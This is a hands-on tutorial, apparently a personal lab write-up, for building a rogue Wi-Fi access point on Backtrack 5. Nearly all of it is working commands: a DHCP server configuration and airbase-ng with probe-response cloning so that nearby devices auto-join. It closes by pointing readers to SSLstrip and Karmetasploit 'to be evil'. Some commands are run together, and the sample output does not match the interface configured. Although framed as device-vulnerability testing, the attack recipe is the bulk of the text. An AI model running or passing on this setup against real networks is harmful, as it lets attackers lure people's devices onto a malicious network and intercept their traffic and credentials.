The purpose of this tutorial was to create a fake access point in my lab which clone-s all accessible wifi networks in the area without the authentication in order to tets if different devices (windows, android, linux) are willing to join to a malicious wifi access point and wether they are vulnerable or not.
I used my Lenovo x230 notebook with the built-in wifi card as I did not want to get innocent people from outside my apartment to be able to join my network. I could have used mac address filtering as well, but did not want to waste time with that. I used Backtrack 5 R3 x64 Gnome operating system.
My fake AP IP address will be: 10.0.0.1
My network interface name is: wlan0
We need several things in order to perform the task:
Set up the DHCP server
Get the server package from repository, stop it after install, save a backup of original configuration and create our own config file:
apt-get install dhcp3-server /etc/init.d/dhcpd stop cd /etc/dhcp3/ cp dhcpd.conf dhcpd.conf.orig nano /etc/dhcp3/dhcpd.conf
I also like to remove DHCP from autostart:
update-rc.d -f dhcp3-server removePut the following contents into the file:
option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }
Now we are ready to go. First we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then, we utilize airbase-ng to start a new network.
airmon-ng airmon-ng start wlan0 airbase-ng -P -C 30 -e "FreeWifi" -v mon0
-P = Respond to all probes
- C 30 = enable beaconing of probed ESSID values (in seconds)
--essid = specify a single (initial) ESSID
-v = verbose
mon0 = Our virtual monitor mode interface
Airbase-ng creates an interface named "at0" tap so you have to configure it and set the mtu size.
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400
Now let's start the DHCP server:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.conf at0
You can check if the DHCP is running with the following command:
ps aux | grep dhcpd
Result should be something like this:
OUTPUT: dhcpd 2956 0.0 0.0 19632 3008 ? Ss 11:00 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0
Now in a new window I like to see the leased IP addresses:
tail -f /var/log/messages|grep dhcpd
To be evil, follow the SSL Strip instructions:
To be evil, follow the Karmetasploit instructions: